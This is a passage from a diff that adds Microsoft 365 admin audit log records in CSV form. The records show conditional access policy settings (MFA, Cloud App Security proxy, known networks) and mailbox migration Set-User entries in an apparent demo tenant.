+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T05:12:57Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:56 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T05:12:56Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:56 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T05:12:56Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:56 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T05:12:55Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T05:12:55Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:54 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T05:12:58Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:58 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-20T05:12:57Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T05:12:56Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T05:12:57Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""5/19/2020 1:39:05 PM""
+  }
+]"
+2020-05-20T05:12:56Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:56 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T04:50:35Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T04:50:35Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T06:24:18Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T05:14:18Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T09:08:37Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T10:52:47Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T10:52:47Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T18:26:10Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T17:17:42Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T16:54:39Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T16:54:39Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T23:18:56Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T00:26:22Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T01:50:12Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T01:50:12Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T01:50:12Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T01:50:12Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T01:50:12Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T01:50:13Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-21T01:50:12Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""5/19/2020 1:39:05 PM""
+  }
+]"
+2020-05-21T01:50:12Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T01:50:13Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
